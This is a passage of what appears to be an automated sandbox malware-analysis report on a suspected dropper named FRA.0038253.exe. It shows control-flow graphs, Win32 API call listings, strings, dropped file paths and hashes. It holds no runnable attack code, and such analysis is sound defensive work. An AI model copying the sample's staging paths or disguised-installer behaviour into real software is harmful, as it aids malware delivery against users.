405791-4057a1 GetWindowRect 183->189 190 4057a4-4057ba TrackPopupMenu 183->190 184->172 189->190 190->184 194 4057c0-4057da 190->194 191->184 193 405667-40567f SendMessageA * 2 191->193 195 405622-40562d ShowWindow 192->195 196 40562f 192->196 193->184 198 4057df-4057fa SendMessageA 194->198 197 405635-40563b call 40432c 195->197 196->197 197->191 198->198 199 4057fc-40581c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 198->199 201 40581e-40583e SendMessageA 199->201 201->201 202 405840-405854 GlobalUnlock SetClipboardData CloseClipboard 201->202 202->184
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405538
                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405547
                                                                          • GetClientRect.USER32(?,?), ref: 00405584
                                                                          • GetSystemMetrics.USER32(00000002), ref: 0040558B
                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055AC
                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055BD
                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055D0
                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055DE
                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055F1
                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405613
                                                                          • ShowWindow.USER32(?,00000008), ref: 00405627
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405648
                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405658
                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405671
                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040567D
                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405556
                                                                            • Part of subcall function 0040432C: SendMessageA.USER32(00000028,?,00000001,0040415C), ref: 0040433A
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405699
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000546D,00000000), ref: 004056A7
                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004056AE
                                                                          • ShowWindow.USER32(00000000), ref: 004056D1
                                                                          • ShowWindow.USER32(?,00000008), ref: 004056D8
                                                                          • ShowWindow.USER32(00000008), ref: 0040571E
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405752
                                                                          • CreatePopupMenu.USER32 ref: 00405763
                                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405778
                                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405798
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057B1
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057ED
                                                                          • OpenClipboard.USER32(00000000), ref: 004057FD
                                                                          • EmptyClipboard.USER32 ref: 00405803
                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040580C
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405816
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040582A
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405843
                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 0040584E
                                                                          • CloseClipboard.USER32 ref: 00405854
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                          • String ID: B
                                                                          • API String ID: 590372296-2384200711
                                                                          • Opcode ID: aa56682a0058abc693aab28f860088d86cd1423b0d49ffcea1c3f6d996dd9dde
                                                                          • Instruction ID: d5bdf021d5a34ecffe6c80fbec8b44066cd97d21a67b6ed31f5fc43fae257e2b
                                                                          • Opcode Fuzzy Hash: aa56682a0058abc693aab28f860088d86cd1423b0d49ffcea1c3f6d996dd9dde
                                                                          • Instruction Fuzzy Hash: FDA16C71A00209FFDF11AFA0DE85AAE7F79EB04355F00403AFA45B61A0CB754E519F58
                                                                          Function 00405A19 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 516 405a19-405a3f call 405cd7 519 405a41-405a53 DeleteFileA 516->519 520 405a58-405a5f 516->520 521 405be2-405be6 519->521 522 405a61-405a63 520->522 523 405a72-405a82 call 406257 520->523 525 405b90-405b95 522->525 526 405a69-405a6c 522->526 529 405a91-405a92 call 405c30 523->529 530 405a84-405a8f lstrcatA 523->530 525->521 528 405b97-405b9a 525->528 526->523 526->525 531 405ba4-405bac call 4065ea 528->531 532 405b9c-405ba2 528->532 533 405a97-405a9a 529->533 530->533 531->521 539 405bae-405bc2 call 405be9 call 4059d1 531->539 532->521 536 405aa5-405aab lstrcatA 533->536 537 405a9c-405aa3 533->537 540 405ab0-405ace lstrlenA FindFirstFileA 536->540 537->536 537->540 554 405bc4-405bc7 539->554 555 405bda-405bdd call 40539b 539->555 542 405ad4-405aeb call 405c14 540->542 543 405b86-405b8a 540->543 550 405af6-405af9 542->550 551 405aed-405af1 542->551 543->525 545 405b8c 543->545 545->525 552 405afb-405b00 550->552 553 405b0c-405b1a call 406257 550->553 551->550 556 405af3 551->556 557 405b02-405b04 552->557 558 405b65-405b77 FindNextFileA 552->558 566 405b31-405b3c call 4059d1 553->566 567 405b1c-405b24 553->567 554->532 560 405bc9-405bd8 call 40539b call 406030 554->560 555->521 556->550 557->553 562 405b06-405b0a 557->562 558->542 564 405b7d-405b80 FindClose 558->564 560->521 562->553 562->558 564->543 576 405b5d-405b60 call 40539b 566->576 577 405b3e-405b41 566->577 567->558 569 405b26-405b2f call 405a19 567->569 569->558 576->558 579 405b43-405b53 call 40539b call 406030 577->579 580 405b55-405b5b 577->580 579->558 580->558
                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(?,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405A42
                                                                          • lstrcatA.KERNEL32(00421928,\*.*,00421928,?,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405A8A
                                                                          • lstrcatA.KERNEL32(?,0040A014,?,00421928,?,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405AAB
                                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,00421928,?,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405AB1
                                                                          • FindFirstFileA.KERNEL32(00421928,?,?,?,0040A014,?,00421928,?,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405AC2
                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F
                                                                          • FindClose.KERNEL32(00000000), ref: 00405B80
                                                                          Strings
                                                                          • "C:\Users\user\Desktop\FRA.0038253.exe", xrefs: 00405A22
                                                                          • \*.*, xrefs: 00405A84
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\FRA.0038253.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                          • API String ID: 2035342205-617743220
                                                                          • Opcode ID: f1679ef5f70ff734a25cf438f2dc45318474c1ecb1e9537d56531407141502a6
                                                                          • Instruction ID: a817277ec7f20b9af2245384c75ee686abf060e187cea1321872b257c958163f
                                                                          • Opcode Fuzzy Hash: f1679ef5f70ff734a25cf438f2dc45318474c1ecb1e9537d56531407141502a6
                                                                          • Instruction Fuzzy Hash: C851D030904A14AADF22AB618C89BAF7B78DF42754F24417BF841B51D2C73C6982DE6D
                                                                          Function 00406973 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 296df7cd9dbe4544da9d0235d5fe1e7d40891dc8a17bd66a4af9835678f605b5
                                                                          • Instruction ID: e92eedcc30d7904230e65b5903ab186ffa4a4f2c8c56811f1de33f85ea582c23
                                                                          • Opcode Fuzzy Hash: 296df7cd9dbe4544da9d0235d5fe1e7d40891dc8a17bd66a4af9835678f605b5
                                                                          • Instruction Fuzzy Hash: E2F18771D04229CBCF18CFA8C8946ADBBB1FF44305F25816ED852BB281D7786A86CF45
                                                                          Function 004065EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(77673410,00422170,00421D28,00405D1A,00421D28,00421D28,00000000,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\), ref: 004065F5
                                                                          • FindClose.KERNEL32(00000000), ref: 00406601
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID: p!B
                                                                          • API String ID: 2295610775-3221062685
                                                                          • Opcode ID: dfc65eb41cf3005a49c9d827d0c2ee39ba4b2e7e25b251809efb7f1ef4f3a872
                                                                          • Instruction ID: 8286600825c1d2c65b5b958d36bd28f21951c74ef72bbff251daebb8155f21c9
                                                                          • Opcode Fuzzy Hash: dfc65eb41cf3005a49c9d827d0c2ee39ba4b2e7e25b251809efb7f1ef4f3a872
                                                                          • Instruction Fuzzy Hash: C7D012315091206BD25117786F0C85B7A599F55370711CF37F5A6F11E0C7758C7286AC
                                                                          Function 00403DFD Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 203 403dfd-403e0f 204 403e15-403e1b 203->204 205 403f76-403f85 203->205 204->205 206 403e21-403e2a 204->206 207 403fd4-403fe9 205->207 208 403f87-403fcf GetDlgItem * 2 call 4042f7 SetClassLongA call 40140b 205->208 209 403e2c-403e39 SetWindowPos 206->209 210 403e3f-403e46 206->210 212 404029-40402e call 404343 207->212 213 403feb-403fee 207->213 208->207 209->210 217 403e48-403e62 ShowWindow 210->217 218 403e8a-403e90 210->218 222 404033-40404e 212->222 214 403ff0-403ffb call 401389 213->214 215 404021-404023 213->215 214->215 239 403ffd-40401c SendMessageA 214->239 215->212 221 4042c4 215->221 223 403f63-403f71 call 40435e 217->223 224 403e68-403e7b GetWindowLongA 217->224 225 403e92-403ea4 DestroyWindow 218->225 226 403ea9-403eac 218->226 233 4042c6-4042cd 221->233 230 404050-404052 call 40140b 222->230 231 404057-40405d 222->231 223->233 224->223 232 403e81-403e84 ShowWindow 224->232 234 4042a1-4042a7 225->234 236 403eae-403eba SetWindowLongA 226->236 237 403ebf-403ec5 226->237 230->231 243 404282-40429b DestroyWindow EndDialog 231->243 244 404063-40406e 231->244 232->218 234->221 242 4042a9-4042af 234->242 236->233 237->223 238 403ecb-403eda GetDlgItem 237->238 245 403ef9-403efc 238->245 246 403edc-403ef3 SendMessageA IsWindowEnabled 238->246 239->233 242->221 247 4042b1-4042ba ShowWindow 242->247 243->234 244->243 248 404074-4040c1 call 4062ea call 4042f7 * 3 GetDlgItem 244->248 249 403f01-403f04 245->249 250 403efe-403eff 245->250 246->221 246->245 247->221 275 4040c3-4040c8 248->275 276 4040cb-404107 ShowWindow KiUserCallbackDispatcher call 404319 EnableWindow 248->276 253 403f12-403f17 249->253 254 403f06-403f0c 249->254 252 403f2f-403f34 call 4042d0 250->252 252->223 256 403f4d-403f5d SendMessageA 253->256 258 403f19-403f1f 253->258 254->256 257 403f0e-403f10 254->257 256->223 257->252 262 403f21-403f27 call 40140b 258->262 263 403f36-403f3f call 40140b 258->263 273 403f2d 262->273 263->223 272 403f41-403f4b 263->272 272->273 273->252 275->276 279 404109-40410a 276->279 280 40410c 276->280 281 40410e-40413c GetSystemMenu EnableMenuItem SendMessageA 279->281 280->281 282 404151 281->282 283 40413e-40414f SendMessageA 281->283 284 404157-404191 call 40432c call 403dde call 406257 lstrlenA call 4062ea SetWindowTextA call 401389 282->284 283->284 284->222 295 404197-404199 284->295 295->222 296 40419f-4041a3 295->296 297 4041c2-4041d6 DestroyWindow 296->297 298 4041a5-4041ab 296->298 297->234 300 4041dc-404209 CreateDialogParamA 297->300 298->221 299 4041b1-4041b7 298->299 299->222 302 4041bd 299->302 300->234 301 40420f-404266 call 4042f7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 300->301 301->221 307 404268-40427b ShowWindow call 404343 301->307 302->221 309 404280 307->309 309->234
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                          • ShowWindow.USER32(?), ref: 00403E59
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00403E6B
                                                                          • ShowWindow.USER32(?,00000004), ref: 00403E84
                                                                          • DestroyWindow.USER32 ref: 00403E98
                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EB1
                                                                          • GetDlgItem.USER32(?,?), ref: 00403ED0
                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EE4
                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403EEB
                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403F96
                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403FA0
                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403FBA
                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 0040400B
                                                                          • GetDlgItem.USER32(?,00000003), ref: 004040B1
                                                                          • ShowWindow.USER32(00000000,?), ref: 004040D2
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040E4
                                                                          • EnableWindow.USER32(?,?), ref: 004040FF
                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404115
                                                                          • EnableMenuItem.USER32(00000000), ref: 0040411C
                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00404134
                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404147
                                                                          • lstrlenA.KERNEL32(spidsmus: Installing,?,spidsmus: Installing,00000000), ref: 00404171
                                                                          • SetWindowTextA.USER32(?,spidsmus: Installing), ref: 00404180
                                                                          • ShowWindow.USER32(?,0000000A), ref: 004042B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                          • String ID: spidsmus: Installing
                                                                          • API String ID: 121052019-477722755
                                                                          • Opcode ID: 61c8b0ccc5816aafeb5dc5fe4a77bf9476a6ca135dfa3a8e91252f3d7819b148
                                                                          • Instruction ID: 58813ef5c6151bb3df3aba3858a4f119a3d94cf73287132a988f8c89e3e9f356
                                                                          • Opcode Fuzzy Hash: 61c8b0ccc5816aafeb5dc5fe4a77bf9476a6ca135dfa3a8e91252f3d7819b148
                                                                          • Instruction Fuzzy Hash: D3C1F5B1A00205BBDB206F61ED85E2B3A7DEB85746F50053EF681B11F1CB799842DB2D
                                                                          Function 00403A60 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 310 403a60-403a78 call 40667f 313 403a7a-403a8a call 4061b5 310->313 314 403a8c-403abd call 40613e 310->314 322 403ae0-403b09 call 403d25 call 405cd7 313->322 318 403ad5-403adb lstrcatA 314->318 319 403abf-403ad0 call 40613e 314->319 318->322 319->318 328 403b90-403b98 call 405cd7 322->328 329 403b0f-403b14 322->329 334 403ba6-403bcb LoadImageA 328->334 335 403b9a-403ba1 call 4062ea 328->335 329->328 330 403b16-403b3a call 40613e 329->330 330->328 340 403b3c-403b3e 330->340 338 403c4c-403c54 call 40140b 334->338 339 403bcd-403bfd RegisterClassA 334->339 335->334 353 403c56-403c59 338->353 354 403c5e-403c69 call 403d25 338->354 343 403c03-403c47 SystemParametersInfoA CreateWindowExA 339->343 344 403d1b 339->344 341 403b40-403b4d call 405c14 340->341 342 403b4f-403b5b lstrlenA 340->342 341->342 348 403b83-403b8b call 405be9 call 406257 342->348 349 403b5d-403b6b lstrcmpiA 342->349 343->338 347 403d1d-403d24 344->347 348->328 349->348 352 403b6d-403b77 GetFileAttributesA 349->352 356 403b79-403b7b 352->356 357 403b7d-403b7e call 405c30 352->357 353->347 363 403cf2-403cf3 call 40546d 354->363 364 403c6f-403c89 ShowWindow call 406611 354->364 356->348 356->357 357->348 367 403cf8-403cfa 363->367 371 403c95-403ca7 GetClassInfoA 364->371 372 403c8b-403c90 call 406611 364->372 369 403d14-403d16 call 40140b 367->369 370 403cfc-403d02 367->370 369->344 370->353 377 403d08-403d0f call 40140b 370->377 375 403ca9-403cb9 GetClassInfoA RegisterClassA 371->375 376 403cbf-403ce2 DialogBoxParamA call 40140b 371->376 372->371 375->376 380 403ce7-403cf0 call 4039b0 376->380 377->353 380->347
                                                                          APIs
                                                                            • Part of subcall function 0040667F: GetModuleHandleA.KERNEL32(?,00000000,?,004034E4,0000000C), ref: 00406691
                                                                            • Part of subcall function 0040667F: GetProcAddress.KERNEL32(00000000,?), ref: 004066AC
                                                                          • lstrcatA.KERNEL32(1033,spidsmus: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,spidsmus: Installing,00000000,00000002,77673410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\FRA.0038253.exe",0000000A,0000000C), ref: 00403ADB
                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek,1033,spidsmus: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,spidsmus: Installing,00000000,00000002,77673410), ref: 00403B50
                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B63
                                                                          • GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\FRA.0038253.exe",0000000A,0000000C), ref: 00403B6E
                                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek), ref: 00403BB7
                                                                            • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                                          • RegisterClassA.USER32(00423AC0), ref: 00403BF4
                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C41
                                                                          • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\FRA.0038253.exe",0000000A,0000000C), ref: 00403C77
                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,00423AC0), ref: 00403CA3
                                                                          • GetClassInfoA.USER32(00000000,RichEdit,00423AC0), ref: 00403CB0
                                                                          • RegisterClassA.USER32(00423AC0), ref: 00403CB9
                                                                          • DialogBoxParamA.USER32(?,00000000,00403DFD,00000000), ref: 00403CD8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: "C:\Users\user\Desktop\FRA.0038253.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$spidsmus: Installing
                                                                          • API String ID: 1975747703-3165389288
                                                                          • Opcode ID: 3c48bf4664ad4c9197e8a7552b24f38ec161e53f14bf8fc6153e2ea131ed51a9
                                                                          • Instruction ID: fb21703a0cb219a8f3641e8b8a3e7395a2c86801f57175af3e535ef3462aab5f
                                                                          • Opcode Fuzzy Hash: 3c48bf4664ad4c9197e8a7552b24f38ec161e53f14bf8fc6153e2ea131ed51a9
                                                                          • Instruction Fuzzy Hash: 9561B6703442046EE620AF659D45F373ABCEB8474AF40443FF981B62E2CB7D9D028A2D
                                                                          Function 00402F31 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
